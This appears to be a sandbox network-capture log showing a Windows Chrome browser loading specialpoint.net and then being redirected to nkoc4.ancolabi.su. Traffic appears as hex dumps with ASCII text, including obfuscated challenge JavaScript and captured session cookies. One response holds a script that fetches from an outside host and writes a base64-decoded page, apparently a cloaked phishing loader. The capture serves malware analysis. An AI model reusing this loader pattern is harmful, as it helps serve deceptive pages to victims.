                                                                                                                                                                                                                                                                2024-08-12 13:23:20 UTC1369INData Raw: 2c 47 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 54 3d 31 2c 47 3d 30 3b 47 3c 4d 3b 4f 3d 54 7c 4f 3c 3c 31 2c 50 3d 3d 45 2d 31 3f 28 50 3d 30 2c 4e 5b 61 61 28 33 35 35 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3d 30 2c 47 2b 2b 29 3b 66 6f 72 28 54 3d 4a 5b 61 61 28 34 33 35 29 5d 28 30 29 2c 47 3d 30 3b 31 36 3e 47 3b 4f 3d 31 2e 31 26 54 7c 4f 3c 3c 31 2c 50 3d 3d 45 2d 31 3f 28 50 3d 30 2c 4e 5b 61 61 28 33 35 35 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3e 3e 3d 31 2c 47 2b 2b 29 3b 7d 4b 2d 2d 2c 4b 3d 3d 30 26 26 28 4b 3d 4d 61 74 68 5b 61 61 28 33 38 32 29 5d 28 32 2c 4d 29 2c 4d 2b 2b 29 2c 64 65 6c 65 74 65 20 49 5b 4a 5d 7d 65 6c 73 65 20 66 6f 72 28 54 3d 48 5b 4a 5d 2c 47 3d 30 3b 47 3c 4d 3b 4f 3d 31 26 54 7c
                                                                                                                                                                                                                                                                Data Ascii: ,G++);}else{for(T=1,G=0;G<M;O=T|O<<1,P==E-1?(P=0,N[aa(355)](F(O)),O=0):P++,T=0,G++);for(T=J[aa(435)](0),G=0;16>G;O=1.1&T|O<<1,P==E-1?(P=0,N[aa(355)](F(O)),O=0):P++,T>>=1,G++);}K--,K==0&&(K=Math[aa(382)](2,M),M++),delete I[J]}else for(T=H[J],G=0;G<M;O=1&T|
                                                                                                                                                                                                                                                                2024-08-12 13:23:20 UTC1369INData Raw: 26 26 28 4f 3d 45 2c 4e 3d 46 28 50 2b 2b 29 29 2c 51 7c 3d 4d 2a 28 30 3c 53 3f 31 3a 30 29 2c 4d 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 51 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 51 3d 30 2c 52 3d 4d 61 74 68 5b 61 64 28 33 38 32 29 5d 28 32 2c 38 29 2c 4d 3d 31 3b 4d 21 3d 52 3b 53 3d 4e 26 4f 2c 4f 3e 3e 3d 31 2c 4f 3d 3d 30 26 26 28 4f 3d 45 2c 4e 3d 46 28 50 2b 2b 29 29 2c 51 7c 3d 4d 2a 28 30 3c 53 3f 31 3a 30 29 2c 4d 3c 3c 3d 31 29 3b 54 3d 65 28 51 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 51 3d 30 2c 52 3d 4d 61 74 68 5b 61 64 28 33 38 32 29 5d 28 32 2c 31 36 29 2c 4d 3d 31 3b 52 21 3d 4d 3b 53 3d 4f 26 4e 2c 4f 3e 3e 3d 31 2c 30 3d 3d 4f 26 26 28 4f 3d 45 2c 4e 3d 46 28 50 2b 2b 29 29 2c 51 7c 3d 28 30 3c 53 3f 31 3a 30 29 2a 4d
                                                                                                                                                                                                                                                                Data Ascii: &&(O=E,N=F(P++)),Q|=M*(0<S?1:0),M<<=1);switch(Q){case 0:for(Q=0,R=Math[ad(382)](2,8),M=1;M!=R;S=N&O,O>>=1,O==0&&(O=E,N=F(P++)),Q|=M*(0<S?1:0),M<<=1);T=e(Q);break;case 1:for(Q=0,R=Math[ad(382)](2,16),M=1;R!=M;S=O&N,O>>=1,0==O&&(O=E,N=F(P++)),Q|=(0<S?1:0)*M
                                                                                                                                                                                                                                                                2024-08-12 13:23:20 UTC1369INData Raw: 63 74 69 6f 6e 20 6b 28 63 2c 65 2c 59 2c 66 2c 43 29 7b 59 3d 56 2c 66 3d 7b 27 77 70 27 3a 41 5b 59 28 34 30 34 29 5d 28 4a 53 4f 4e 5b 59 28 33 34 30 29 5d 28 65 29 29 2c 27 73 27 3a 59 28 33 36 36 29 7d 2c 43 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 2c 43 5b 59 28 33 37 35 29 5d 28 59 28 33 37 36 29 2c 59 28 33 39 35 29 2b 67 5b 59 28 33 37 32 29 5d 5b 59 28 33 34 37 29 5d 2b 59 28 33 39 31 29 2b 63 29 2c 43 5b 59 28 33 35 38 29 5d 28 59 28 33 35 31 29 2c 59 28 34 30 39 29 29 2c 43 5b 59 28 33 35 30 29 5d 28 4a 53 4f 4e 5b 59 28 33 34 30 29 5d 28 66 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 61 37 2c 43 2c 44 2c 45 2c 46 2c 47 29 7b 61 37 3d 56 3b 74 72 79 7b 72 65 74 75 72 6e 20 43 3d 68 5b 61 37 28 34 32 36 29 5d 28 61 37 28 33
                                                                                                                                                                                                                                                                Data Ascii: ction k(c,e,Y,f,C){Y=V,f={'wp':A[Y(404)](JSON[Y(340)](e)),'s':Y(366)},C=new XMLHttpRequest(),C[Y(375)](Y(376),Y(395)+g[Y(372)][Y(347)]+Y(391)+c),C[Y(358)](Y(351),Y(409)),C[Y(350)](JSON[Y(340)](f))}function z(a7,C,D,E,F,G){a7=V;try{return C=h[a7(426)](a7(3
                                                                                                                                                                                                                                                                2024-08-12 13:23:20 UTC1369INData Raw: 3f 27 46 27 3a 28 45 3d 74 79 70 65 6f 66 20 43 5b 44 5d 2c 61 31 28 33 34 31 29 3d 3d 45 3f 6f 28 65 2c 43 5b 44 5d 29 3f 27 4e 27 3a 27 66 27 3a 6e 5b 45 5d 7c 7c 27 3f 27 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 63 2c 57 29 7b 72 65 74 75 72 6e 20 57 3d 56 2c 4d 61 74 68 5b 57 28 34 33 30 29 5d 28 29 3c 63 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 63 2c 65 2c 61 30 29 7b 72 65 74 75 72 6e 20 61 30 3d 56 2c 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 63 5b 61 30 28 33 35 34 29 5d 26 26 30 3c 63 5b 61 30 28 33 35 34 29 5d 5b 61 30 28 33 39 39 29 5d 5b 61 30 28 34 30 35 29 5d 5b 61 30 28 34 32 34 29 5d 28 65 29 5b 61 30 28 33 39 32 29 5d 28 61 30 28 34 32 32 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 61 68 29 7b 72 65 74 75 72 6e 20 61 68 3d 27 5f 63 66 5f 63 68 6c 5f
                                                                                                                                                                                                                                                                Data Ascii: ?'F':(E=typeof C[D],a1(341)==E?o(e,C[D])?'N':'f':n[E]||'?')}function i(c,W){return W=V,Math[W(430)]()<c}function o(c,e,a0){return a0=V,e instanceof c[a0(354)]&&0<c[a0(354)][a0(399)][a0(405)][a0(424)](e)[a0(392)](a0(422))}function a(ah){return ah='_cf_chl_
                                                                                                                                                                                                                                                                2024-08-12 13:23:20 UTC245INData Raw: 52 7a 64 43 24 75 47 65 6b 35 39 5a 30 2d 42 71 57 61 4c 67 51 6d 50 6c 76 53 2b 68 4f 46 63 38 2c 6d 73 67 2c 31 30 30 36 39 32 39 4a 61 44 59 4b 56 2c 6e 75 6d 62 65 72 2c 69 66 72 61 6d 65 2c 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 2c 30 2e 39 31 31 30 32 30 32 35 38 34 36 34 39 35 30 33 3a 31 37 32 33 34 36 35 34 38 35 3a 39 45 35 38 68 76 50 31 59 5a 79 56 43 76 73 39 6f 4c 72 75 33 6b 57 79 78 2d 70 4e 70 69 77 37 58 6f 5a 75 38 6d 4c 36 71 6c 41 2c 62 69 6e 64 2c 73 74 79 6c 65 2c 74 69 6d 65 6f 75 74 2c 6c 6f 61 64 69 6e 67 2c 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 27 2e 73 70 6c 69 74 28 27 2c 27 29 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 68 7d 2c 61 28 29 7d 7d 28 29
                                                                                                                                                                                                                                                                Data Ascii: RzdC$uGek59Z0-BqWaLgQmPlvS+hOFc8,msg,1006929JaDYKV,number,iframe,onreadystatechange,0.9110202584649503:1723465485:9E58hvP1YZyVCvs9oLru3kWyx-pNpiw7XoZu8mL6qlA,bind,style,timeout,loading,addEventListener'.split(','),a=function(){return ah},a()}}()


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                20192.168.2.449853188.114.96.34437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:20 UTC1016OUTPOST /cdn-cgi/challenge-platform/h/g/jsd/r/8b20c7739b2319b2 HTTP/1.1
                                                                                                                                                                                                                                                                Host: specialpoint.net
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 15739
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Origin: https://specialpoint.net
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                Cookie: 7kP2-qok0lQDSgS5QI_1bI1YJcI=FC4yW9_pqdYUTlZz8DToWRyTXJg; BfIXpQ8HLf2HlwQby-i5VYmY1UQ=1723468997; C0Pdmwq0diPL4zHheBbw87DvKQ0=1723555397; w1hY5oz7fIQPRVtBdM0Mqs-wkz8=apJT5sJ29sm__xnJuYb_3c5EIBc; T0n5cGT8ytj8Ccr65xXO6I_0njs=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; _HFN_Wm0L5Mhhqk1oFNnI8cYVYc=1723468998; 8xSp-vytl8r8hR9WfQ4I6DyfqXs=1723555398; GHwRErz7w44NUJIP52zhojU3tp0=dxTf3kwwFhmU3kprsXZOOH7Q8OI
                                                                                                                                                                                                                                                                2024-08-12 13:23:20 UTC15739OUTData Raw: 7b 22 77 70 22 3a 22 45 6c 33 70 77 62 6a 41 77 37 33 77 4a 49 73 6a 6d 6a 4c 4d 54 70 62 57 4d 78 52 4d 36 61 36 66 66 62 41 6a 51 59 4d 4b 67 57 50 67 48 33 4d 43 4b 68 34 73 67 37 6a 47 4d 4a 6d 33 6f 5a 6c 6c 4d 78 64 66 4d 6e 4d 66 57 66 33 6a 4d 55 66 6a 75 73 4f 70 64 37 6c 2d 42 58 70 4b 67 79 6c 52 78 30 47 4c 49 6f 69 70 75 79 77 24 52 76 6a 30 71 68 4d 39 75 52 54 43 35 44 36 4c 4a 72 73 44 36 43 62 35 45 33 4d 73 70 52 47 42 59 72 4d 4d 32 6f 75 4b 37 33 33 6a 79 4d 49 43 4d 6a 36 43 4d 48 66 6a 6a 55 33 5a 66 48 4d 4d 53 4d 49 30 79 4d 4d 68 66 35 67 6c 73 78 48 6c 62 45 6f 4a 66 4d 49 51 41 4d 4b 4a 65 44 4d 65 4b 4d 77 41 68 56 70 66 4a 42 6a 61 4b 6e 6f 64 79 45 77 71 55 78 52 7a 33 46 33 6a 24 4d 4b 43 79 61 33 4d 76 33 48 65 74 4e 73 74
                                                                                                                                                                                                                                                                Data Ascii: {"wp":"El3pwbjAw73wJIsjmjLMTpbWMxRM6a6ffbAjQYMKgWPgH3MCKh4sg7jGMJm3oZllMxdfMnMfWf3jMUfjusOpd7l-BXpKgylRx0GLIoipuyw$Rvj0qhM9uRTC5D6LJrsD6Cb5E3MspRGBYrMM2ouK733jyMICMj6CMHfjjU3ZfHMMSMI0yMMhf5glsxHlbEoJfMIQAMKJeDMeKMwAhVpfJBjaKnodyEwqUxRz3F3j$MKCya3Mv3HetNst
                                                                                                                                                                                                                                                                2024-08-12 13:23:20 UTC964INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:20 GMT
                                                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.specialpoint.net; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                Set-Cookie: cf_clearance=OkAG_sqmQcPLPmqd.KUnYz2Cnga9qjYeGRgTYObd2Lg-1723469000-1.0.1.1-vryc6T.KBo3.PXbZzDp19zY7hFL4QuE83LVE8rfuY_uC_oRtf1FsbL_EWCXn_o4x6JPBAuuHC9uIlcorHYxjEQ; Path=/; Expires=Tue, 12-Aug-25 13:23:20 GMT; Domain=.specialpoint.net; HttpOnly; Secure; SameSite=None; Partitioned
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rOabyvxrwq%2FNffrTS55t6hpQTaQjcm3eUFnbc75E3NsCzPVcS83tZWdXFt16D0KrkXtJmFtkIb27cgD4ckmIr9Woy7jj6ZRB%2FqsspQVtL7VQ1Sq5bQRJavibAzpu%2BZKl%2BKTh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8b20c7873cd71906-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                21192.168.2.449852104.21.62.2204437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:20 UTC691OUTGET /YOBEzWvY/ HTTP/1.1
                                                                                                                                                                                                                                                                Host: nkoc4.ancolabi.su
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Referer: https://specialpoint.net/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC1003INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:21 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Cache-Control: no-cache, private
                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tD3uLsJsYSNmHA5iZ6XQYnTPqPnBwrYJtEq2NhVJKL9uhFwU7EwrsiyccmRV90ti2UEgTtBllZflN%2BBQNejkJJUcShzvWYmr8%2FeFOei8vN6PQq9uEbNjjhOm94jEvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Set-Cookie: XSRF-TOKEN=eyJpdiI6InlKcUlyckxIYVJReWdiaU9neFg5RlE9PSIsInZhbHVlIjoicEhNZUsvNE0xK2NEbWpTRG41YTJ3c2ZsZFU5dmtxQkc1WEZpc0JTdzVqajVxblIvYlo4Z0V1M3lsbnFsdENyTXRCNmZ4N3pSQXpzWWpEWVVyUUxtRGxGTzV2ZERYU2gyeTV4YUYvMEdpMTd4aHRnbU4xUG4vdjB6a1UxdzVCeTUiLCJtYWMiOiJiMjhiZjVjZWJlMGE4NDYwYTNhOWUzMWM1ZTI2MzMxODc1NWJkNzYzNzlmOTMzMWUxMzIxZWNjZjI3Y2I3MTY5IiwidGFnIjoiIn0%3D; expires=Mon, 12-Aug-2024 15:23:21 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 35 52 59 69 74 76 56 6d 74 33 52 7a 63 79 61 56 68 70 63 6b 52 4b 63 6b 78 6d 52 32 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 44 42 77 53 32 64 4a 62 6b 78 4f 4d 6d 64 75 61 45 74 36 54 56 46 55 61 48 64 57 52 6a 6b 31 59 31 51 33 64 33 6c 6c 55 6d 31 76 53 55 6c 78 5a 6d 31 6c 65 47 6b 76 59 55 64 50 57 47 64 76 52 6b 70 4f 63 6d 64 57 4b 30 4e 31 4e 6e 5a 69 52 47 46 4a 4d 55 70 36 56 45 52 6b 4e 6b 74 53 5a 47 56 6d 62 6b 39 44 63 6c 68 78 52 43 74 56 65 43 39 61 64 57 31 71 65 47 34 35 62 6d 73 31 55 31 41 34 56 6a 56 47 4c 31 6c 5a 61 55 78 51 57 6e 49 34 51 6d 6c 72 4d 57 56 47 53 44 46 5a 61 57 46 6e 4e 44 52 44 56 45 6f
                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ik5RYitvVmt3RzcyaVhpckRKckxmR2c9PSIsInZhbHVlIjoiaDBwS2dJbkxOMmduaEt6TVFUaHdWRjk1Y1Q3d3llUm1vSUlxZm1leGkvYUdPWGdvRkpOcmdWK0N1NnZiRGFJMUp6VERkNktSZGVmbk9DclhxRCtVeC9adW1qeG45bms1U1A4VjVGL1lZaUxQWnI4QmlrMWVGSDFZaWFnNDRDVEo
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC1369INData Raw: 34 33 66 34 0d 0a 3c 73 63 72 69 70 74 3e 66 65 74 63 68 28 27 68 74 74 70 73 3a 2f 2f 49 69 43 2e 6a 61 69 73 68 69 63 74 2e 72 75 2f 70 69 74 70 75 75 7a 68 6e 6d 78 71 6b 73 68 69 68 72 6b 70 64 6a 6a 6d 7a 79 51 4e 68 72 4c 44 57 5a 49 4a 41 41 44 53 42 54 50 41 50 41 4a 50 4c 43 44 49 49 55 5a 27 2c 20 7b 0d 0a 6d 65 74 68 6f 64 3a 20 22 47 45 54 22 2c 0d 0a 7d 29 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 7b 0d 0a 72 65 74 75 72 6e 20 72 65 73 70 6f 6e 73 65 2e 74 65 78 74 28 29 0d 0a 7d 29 2e 74 68 65 6e 28 74 65 78 74 20 3d 3e 20 7b 0d 0a 69 66 28 74 65 78 74 20 3d 3d 20 30 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45
                                                                                                                                                                                                                                                                Data Ascii: 43f4<script>fetch('https://IiC.jaishict.ru/pitpuuzhnmxqkshihrkpdjjmzyQNhrLDWZIJAADSBTPAPAJPLCDIIUZ', {method: "GET",}).then(response => {return response.text()}).then(text => {if(text == 0){document.write(decodeURIComponent(escape(atob('PCFE
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC1369INData Raw: 30 4b 66 51 30 4b 49 31 5a 42 52 33 56 43 56 31 42 73 62 6b 77 67 63 48 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 6a 41 37 62 57 46 79 5a 32 6c 75 4c 57 4a 76 64 48 52 76 62 54 6f 78 63 6d 56 74 4f 33 30 4e 43 69 4e 57 51 55 64 31 51 6c 64 51 62 47 35 4d 4c 6d 4e 76 62 6e 52 68 61 57 35 6c 63 6e 74 77 62 33 4e 70 64 47 6c 76 62 6a 6f 67 63 6d 56 73 59 58 52 70 64 6d 55 37 64 47 39 77 4f 69 41 31 4d 48 42 34 4f 33 4a 70 5a 32 68 30 4f 69 41 33 4d 6e 42 34 4f 33 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59
                                                                                                                                                                                                                                                                Data Ascii: 0KfQ0KI1ZBR3VCV1BsbkwgcHttYXJnaW4tdG9wOjA7bWFyZ2luLWJvdHRvbToxcmVtO30NCiNWQUd1QldQbG5MLmNvbnRhaW5lcntwb3NpdGlvbjogcmVsYXRpdmU7dG9wOiA1MHB4O3JpZ2h0OiA3MnB4O3dpZHRoOiAxMDAlO3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tY
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC1369INData Raw: 68 63 69 67 74 4c 57 4e 68 62 45 67 70 49 43 73 67 4d 6a 42 77 65 43 6b 37 44 51 6f 67 49 43 41 67 4c 53 31 6a 59 57 78 5a 52 58 68 30 4f 69 42 6a 59 57 78 6a 4b 48 5a 68 63 69 67 74 4c 57 4e 68 62 45 67 70 49 43 30 67 4f 44 42 77 65 43 6b 37 44 51 6f 67 49 43 41 67 4c 53 31 6a 59 57 78 5a 54 33 5a 6c 63 6b 56 34 64 44 6f 67 59 32 46 73 59 79 68 32 59 58 49 6f 4c 53 31 6a 59 57 78 49 4b 53 41 74 49 44 6b 79 63 48 67 70 4f 77 30 4b 49 43 41 67 49 43 30 74 5a 6d 78 68 63 46 4d 36 49 44 6b 32 63 48 67 37 44 51 6f 67 49 43 41 67 4c 53 31 6d 62 47 46 77 53 44 6f 67 59 32 46 73 59 79 67 77 4c 6a 55 31 49 43 6f 67 64 6d 46 79 4b 43 30 74 5a 57 35 32 53 43 6b 70 4f 77 30 4b 49 43 41 67 49 43 30 74 5a 6d 78 68 63 46 4e 6a 59 57 78 6c 57 54 6f 67 59 32 46 73 59 79
                                                                                                                                                                                                                                                                Data Ascii: hcigtLWNhbEgpICsgMjBweCk7DQogICAgLS1jYWxZRXh0OiBjYWxjKHZhcigtLWNhbEgpIC0gODBweCk7DQogICAgLS1jYWxZT3ZlckV4dDogY2FsYyh2YXIoLS1jYWxIKSAtIDkycHgpOw0KICAgIC0tZmxhcFM6IDk2cHg7DQogICAgLS1mbGFwSDogY2FsYygwLjU1ICogdmFyKC0tZW52SCkpOw0KICAgIC0tZmxhcFNjYWxlWTogY2FsYy
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC1369INData Raw: 62 6e 4e 73 59 58 52 6c 4b 43 30 78 4e 54 4e 77 65 43 77 74 4e 7a 42 77 65 43 6b 67 63 6d 39 30 59 58 52 6c 4b 44 49 34 5a 47 56 6e 4b 54 74 39 44 51 6f 6a 5a 57 59 2b 4c 6e 4a 37 64 32 6c 6b 64 47 67 36 4d 6a 67 33 63 48 67 37 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 44 6f 6a 4d 54 51 35 4d 47 52 6d 4f 33 52 79 59 57 35 7a 5a 6d 39 79 62 54 70 30 63 6d 46 75 63 32 78 68 64 47 55 6f 4c 54 45 79 4d 48 42 34 4c 44 59 7a 63 48 67 70 49 48 4a 76 64 47 46 30 5a 53 67 74 4d 6a 68 6b 5a 57 63 70 4f 33 30 4e 43 69 4e 6c 59 6e 74 33 61 57 52 30 61 44 70 32 59 58 49 6f 4c 53 31 6c 62 6e 5a 58 4b 54 74 6f 5a 57 6c 6e 61 48 51 36 4e 44 42 77 65 44 74 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4f 69 4d 78 4d 6a 4e 69 4e 6d 51 37 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f
                                                                                                                                                                                                                                                                Data Ascii: bnNsYXRlKC0xNTNweCwtNzBweCkgcm90YXRlKDI4ZGVnKTt9DQojZWY+LnJ7d2lkdGg6Mjg3cHg7YmFja2dyb3VuZDojMTQ5MGRmO3RyYW5zZm9ybTp0cmFuc2xhdGUoLTEyMHB4LDYzcHgpIHJvdGF0ZSgtMjhkZWcpO30NCiNlYnt3aWR0aDp2YXIoLS1lbnZXKTtoZWlnaHQ6NDBweDtiYWNrZ3JvdW5kOiMxMjNiNmQ7bWFyZ2luLXRvcDo
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC1369INData Raw: 6d 46 79 4b 43 30 74 5a 57 35 32 56 79 6b 37 59 57 35 70 62 57 46 30 61 57 39 75 4f 6d 4e 73 62 33 4e 6c 5a 43 31 6d 62 47 46 77 4c 58 4e 33 61 57 35 6e 49 48 5a 68 63 69 67 74 4c 57 52 31 63 69 6b 67 61 57 35 6d 61 57 35 70 64 47 55 37 59 57 35 70 62 57 46 30 61 57 39 75 4c 58 52 70 62 57 6c 75 5a 79 31 6d 64 57 35 6a 64 47 6c 76 62 6a 70 6a 64 57 4a 70 59 79 31 69 5a 58 70 70 5a 58 49 6f 4d 43 34 7a 4d 69 77 77 4c 44 41 75 4e 6a 63 73 4d 43 6b 37 64 48 4a 68 62 6e 4e 6d 62 33 4a 74 4c 57 39 79 61 57 64 70 62 6a 70 30 62 33 41 37 64 48 4a 68 62 6e 4e 6d 62 33 4a 74 4f 6e 52 79 59 57 35 7a 62 47 46 30 5a 56 6b 6f 59 32 46 73 59 79 67 74 4d 53 41 71 49 48 5a 68 63 69 67 74 4c 57 56 75 64 6b 67 70 4b 53 6b 67 63 6d 39 30 59 58 52 6c 4d 32 51 6f 4d 53 77 77
                                                                                                                                                                                                                                                                Data Ascii: mFyKC0tZW52Vyk7YW5pbWF0aW9uOmNsb3NlZC1mbGFwLXN3aW5nIHZhcigtLWR1cikgaW5maW5pdGU7YW5pbWF0aW9uLXRpbWluZy1mdW5jdGlvbjpjdWJpYy1iZXppZXIoMC4zMiwwLDAuNjcsMCk7dHJhbnNmb3JtLW9yaWdpbjp0b3A7dHJhbnNmb3JtOnRyYW5zbGF0ZVkoY2FsYygtMSAqIHZhcigtLWVudkgpKSkgcm90YXRlM2QoMSww
                                                                                                                                                                                                                                                                2024-08-12 13:23:21 UTC1369INData Raw: 52 6c 57 53 68 32 59 58 49 6f 4c 53 31 6a 59 57 78 5a 52 58 68 30 4b 53 6b 67 63 32 4e 68 62 47 56 5a 4b 44 45 70 4f 32 46 75 61 57 31 68 64 47 6c 76 62 69 31 30 61 57 31 70 62 6d 63 74 5a 6e 56 75 59 33 52 70 62 32 34 36 59 33 56 69 61 57 4d 74 59 6d 56 36 61 57 56 79 4b 44 41 75 4e 6a 59 73 4c 54 41 75 4d 54 59 73 4d 53 77 74 4d 43 34 79 4f 53 6b 37 66 58 30 4e 43 6b 42 72 5a 58 6c 6d 63 6d 46 74 5a 58 4d 67 62 33 42 6c 62 6d 56 6b 4c 57 5a 73 59 58 41 74 63 33 64 70 62 6d 64 37 4d 43 55 73 4d 54 41 77 4a 53 77 78 4e 43 34 31 4a 53 77 33 4e 69 56 37 64 48 4a 68 62 6e 4e 6d 62 33 4a 74 4f 6e 52 79 59 57 35 7a 62 47 46 30 5a 56 6b 6f 4c 54 59 34 63 48 67 70 49 48 4a 76 64 47 46 30 5a 54 4e 6b 4b 44 45 73 4d 43 77 77 4c 43 30 35 4d 47 52 6c 5a 79 6b 37 66
